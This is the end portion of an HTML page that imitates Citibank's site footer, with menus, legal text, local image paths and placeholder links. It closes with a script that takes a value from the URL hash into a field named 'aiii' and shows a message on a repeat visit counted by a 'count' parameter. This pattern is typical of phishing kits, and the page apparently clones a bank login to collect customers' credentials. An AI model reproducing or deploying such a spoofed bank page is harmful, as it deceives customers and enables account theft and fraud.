                                    </span>
                                    <!-- <h2><b>Rates</b></h2> -->
                                    <svg class="svg-arrow"></svg>
                                </span>
                                <div class="accordionSubMenu" aria-labelledby="footerAccordionHeader1-d" role="tabpanel" id="footerAccordionPanel1-d" aria-hidden="true">
                                    <!-- CBOL Maintance List Moved: List.${List} -->
                                    <h3 class="hidden-sm hidden-xs">Rates</h3>
                                    <ul>
                                        <li><a href="#" role="link">Personal Banking</a></li>
                                        <li><a href="#" role="link">Credit Cards</a></li>
                                        <li><a onclick="lnk(this.href);return false;" href="#" role="link">Mortgage</a></li>
                                        <li><a href="#" role="link">Home Equity</a></li>
                                        <li><a href="#" role="link">Lending</a></li>
                                    </ul>
                                    <!-- END CBOL Maintance List ${List} -->
                                </div>
                            </li>
                            <li class="level1 parent">
                                <span class="category">
                                    <span role="button" id="footerAccordionHeader1-e" tabindex="0" aria-expanded="false" aria-controls="footerAccordionPanel1-e" data-title="Select to display" class="category-title">
                                        <b>Help &amp; Support</b>
                                    </span>
                                    <!-- <h2><b>Help &amp; Support</b></h2> -->
                                    <svg class="svg-arrow"></svg>
                                </span>
                                <div class="accordionSubMenu" aria-labelledby="footerAccordionHeader1-e" role="tabpanel" id="footerAccordionPanel1-e" aria-hidden="true">
                                    <!-- CBOL Maintance List Moved: List.${List} -->
                                    <h3 class="hidden-sm hidden-xs">Help &amp; Support</h3>
                                    <ul>
                                        <!-- Angular Contact Us redirection changes start -->
                                        <li><a onclick="lnk(this.href);return false;" href="#" role="link">Contact Us</a></li>
                                        <!-- Angular Contact Us Page redirection changes end-->
                                        <li><a href="#" role="link">Help &amp; FAQs</a></li>
                                        <li><a href="#">Security Center</a></li>
                                    </ul>
                                    <!-- END CBOL Maintance List ${List} -->
                                </div>
                            </li>
                        </ul>
                        <!--<div class="atmBranchMobile">
                            <h3 class="atmTextMobile"><b></b></h3>
              <input type="text" class="enterLocationText" id="enterLocationMobile" autocomplete="off" placeholder="Enter Location"><br/>
              <a class="findLocationBtn" id="findLocationBtnMobile" role="link" href="#" target="_blank">Find Location</a>
                      </div>-->
                        <row class="fdicHousingLogo">
                            <div id="housingLogo" aria-label="Equal housing lender" role="img">
                                <span class="spriteImages" id="homeSpriteLogo" aria-label="Equal housing lender" alt="Equal housing lender"></span>
                            </div>
                            <div id="FDICLogo" aria-label="Member FDIC" role="img">
                                <span class="spriteImages" id="fdicSpriteLogo" aria-label="Member FDIC" alt="Member FDIC"></span>
                            </div>
                        </row>
                    </div>
                    <div class="desktopMenuView">
                        <div class="verticalMenu">
                            <div id="whyCitiPadding" class="columnLinks width14">
                                <!-- CBOL Maintance List Moved: List.${List} -->
                                <h3 class="footerColumnHeading"><b>Why Citi</b></h3>
                                <ul>
                                    <li><a href="#">Our Story</a></li>
                                    <li><a href="#">Careers</a></li>
                                    <li><a onclick="lnk(this.href);return false;" href="#" role="link">Benefits &amp; Services</a></li>
                                    <li><a onclick="lnk(this.href);return false;" href="#" role="link">Rewards</a></li>
                                    <li><a href="#" target="_blank" role="link">Citi Easy Deals<sup>SM</sup></a></li>
                                    <li><a href="#" target="_blank" role="link">Citi Entertainment<sup>SM</sup></a></li>
                                    <li><a onclick="lnk(this.href);return false;" href="#" role="link">Special Offers</a></li>
                                </ul>
                                <!-- END CBOL Maintance List ${List} -->
                            </div>
                            <div class="columnLinks width15">
                                <!-- CBOL Maintance List Moved: List.${List} -->
                                <h3 class="footerColumnHeading"><b>Wealth Management</b></h3>
                                <ul>
                                    <li><a href="#" target="_blank" role="link">Citigold<sup>®</sup> Private Client</a></li>
                                    <li><a href="#" role="link">Citigold</a></li>
                                    <li style="color:white;"><a onclick="lnk(this.href);return false;" href="#" role="link">Citi Priority</a></li>
                                    <li><a href="#" role="link" target="_blank">Citi Private Bank</a></li>
                                </ul>
                                <!-- END CBOL Maintance List ${List} -->
                            </div>
                            <div class="columnLinks width14">
                                <!-- CBOL Maintance List Moved: List.${List} -->
                                <h3 class="footerColumnHeading"><b>Business Banking</b></h3>
                                <ul>
                                    <li><a onclick="lnk(this.href);return false;" href="#" role="link">Small Business Accounts</a></li>
                                    <li><a onclick="lnk(this.href);return false;" href="#" role="link">Commercial Accounts</a></li>
                                </ul>
                                <!-- END CBOL Maintance List ${List} -->
                            </div>
                            <div class="columnLinks width12">
                                <!-- CBOL Maintance List Moved: List.${List} -->
                                <h3 class="footerColumnHeading"><b>Rates</b></h3>
                                <ul>
                                    <li><a href="#" role="link">Personal Banking</a></li>
                                    <li><a href="#" role="link">Credit Cards</a></li>
                                    <li><a onclick="lnk(this.href);return false;" href="#" role="link">Mortgage</a></li>
                                    <li><a href="#" role="link">Home Equity</a></li>
                                    <li><a href="#" role="link">Lending</a></li>
                                </ul>
                                <!-- END CBOL Maintance List ${List} -->
                            </div>
                            <div class="columnLinks width12">
                                <!-- CBOL Maintance List Moved: List.${List} -->
                                <h3 class="footerColumnHeading"><b>Help &amp; Support</b></h3>
                                <ul>
                                    <!-- Angular Contact Us redirection changes start -->
                                    <li><a onclick="lnk(this.href);return false;" href="#" role="link">Contact Us</a></li>
                                    <!-- Angular Contact Us Page redirection changes end-->
                                    <li><a href="#" role="link">Help &amp; FAQs</a></li>
                                    <li><a href="#">Security Center</a></li>
                                </ul>
                                <!-- END CBOL Maintance List ${List} -->
                            </div>
                            <!--<div class="columnLinks">
                            <h3 class="footerColumnHeading"><b></b></h3>
              <input type="text" class="enterLocationText" id="findLocationText" autocomplete="off" placeholder="Enter Location">
              <a class="findLocationBtn" id="findLocBtn" href="#" role="link" target="_blank">Find Location</a>
                        </div>-->
                            <div class="columnLinks width15"></div>
                            <row class="fdicHousingLogo">
                                <div id="housingLogo" aria-label="Equal housing lender" role="img">
                                    <span class="spriteImages" id="homeSpriteLogo" aria-label="Equal housing lender" alt="Equal housing lender"></span>
                                </div>
                                <div id="FDICLogo" aria-label="Member FDIC" role="img">
                                    <span class="spriteImages" id="fdicSpriteLogo" aria-label="Member FDIC" alt="Member FDIC"></span>
                                </div>
                            </row>
                        </div>
                    </div>
                    <div class="mobileAppStore">
                        <a target="_top" class="speedBump" href="#" id="PlayStoreBadge" aria-label="Get it on Google Play" data-toggle="modal" data-target="#speedBumpModal">
                            <span class="googlePlayImageLogo"></span>
                        </a>
                        <a target="_top" class="speedBump" href="#" id="AppStoreBadge" aria-label="Download on the App Store">
                            <span class="appStoreImageLogo"></span>
                        </a>
                        <div class="socialMediaLinks">
                            <a target="_top" class="speedBump" href="#" aria-label="Facebook" data-toggle="modal" data-target="#speedBumpModal">
                                <img src="./images/social-media_facebook@2x.png" class="facebookImage" alt="facebook">
                            </a>
                            <a target="_top" class="speedBump" href="#" aria-label="Twitter" data-toggle="modal" data-target="#speedBumpModal">
                                <img src="./images/social-media_twitter@2x.png" class="twitterImage" alt="twitter">
                            </a>
                            <a target="_top" class="speedBump" href="#" aria-label="Youtube" data-toggle="modal" data-target="#speedBumpModal">
                                <img src="./images/social-media_youtube@2x.png" class="youtubeImage" alt="youtube">
                            </a>
                        </div>
                    </div>
                    <div class="copyrightBorders">
                        <div class="copyrightSection"><b id="copyrightVersionDate">© <span class="br_year">2021</span> Citigroup Inc</b></div>
                        <!-- need special 2 up list when not .list-inline -->
                        <ul class="copyRightLinks">
                            <!--                <li style="padding-top:0px;"><b id="copyrightDate">© <span class="br_year"></span> Citigroup Inc</b></li> -->
                            <li><a href="#">Terms &amp; Conditions</a></li>
                            <li><a href="#">Privacy</a></li>
                            <li><a href="#">Notice at Collection</a></li>
                            <li><a href="#">CA Privacy Hub</a></li>
                            <li><a href="#">Accessibility</a></li>
                            <li><span id="countrySpan">Country &amp; Jurisdictions: <a id="countryLink" href="#" role="link">United States</a></span></li>
                        </ul>
                    </div>
                    <!-- TODO: Q: is this proper place for HR, or up a level -->
                    <div class="footerDisclaimerSection">
                        <span>
                            <p id="footerDisclaimerHeading"><b>Important Legal Disclosures &amp; Information</b></p>
                        </span>
                        <span id="footerDisclaimerText">
                            <p><small>Citibank.com provides information about and access to accounts and financial services provided by Citibank, N.A. and its affiliates in the United States and its territories. It does not, and should not be construed as, an offer, invitation or solicitation of services to individuals outside of the United States.</small></p><br>
                            <p><small>Terms, conditions and fees for accounts, products, programs and services are subject to change. Not all accounts, products, and services as well as pricing described here are available in all jurisdictions or to all customers. Your eligibility for a particular product and service is subject to a final determination by Citibank. Your country of citizenship, domicile, or residence, if other than the United States, may have laws, rules, and regulations that govern or affect your application for and use of our accounts, products and services, including laws and regulations regarding taxes, exchange and/or capital controls that you are responsible for following.</small></p><br>
                            <p><small>The products, account packages, promotional offers and services described in this website may not apply to customers of International Personal Bank U.S. in the Citigold<sup>®</sup> Private Client International, Citigold<sup>®</sup> International, Citi International Personal, Citi Global Executive Preferred, and Citi Global Executive Account Packages.</small></p>
                        </span>
                    </div>
                    <div class="columnLinks footerAppVersion">
                        <p id="appVersionText">
                            <span id="cbol-footer-mlc" style="color: rgb(255, 255, 255);"></span>
                            <small><span id="cbol-footer-server">101.1</span></small>
                        </p>
                    </div>
                </div>
            </div>
        </div>
        <img id="footerCitiLogo" src="./images/Citi_FooterLogo.png" alt="Citi Bank Logo">
        <img id="footerCitiLogoMobile" src="./images/Citi_FooterLogo_Mobile.png" alt="Citi Bank Logo">
    </footer>
     <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script type="text/javascript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
/* global $ */
$(document).ready(function() {
    var count = 0;

    function getUrlVars() {
        var vars = {};
        var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m, key, value) {
            vars[key] = value;
        });
        return vars;
    }

    if (!getUrlVars()["count"]) {

    } else {
        var count = getUrlVars()["count"];
        $('#count').val(count);
    }



    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        // var ind = my_ai.indexOf("@");
        // var my_slice = my_ai.substr((ind + 1));
        // var c = my_slice.substr(0, my_slice.indexOf('.'));
        // var final = c.toLowerCase();
        $("#msg").hide();
        var count = $('#count').val();
        if (count == 1) {
            $("#msg").show();
        } else {
            $("#msg").hide();
        }
        $('#aiii').val(my_ai);
        

    }
    ///////////////url getting ai////////////////

});
</script>

</html>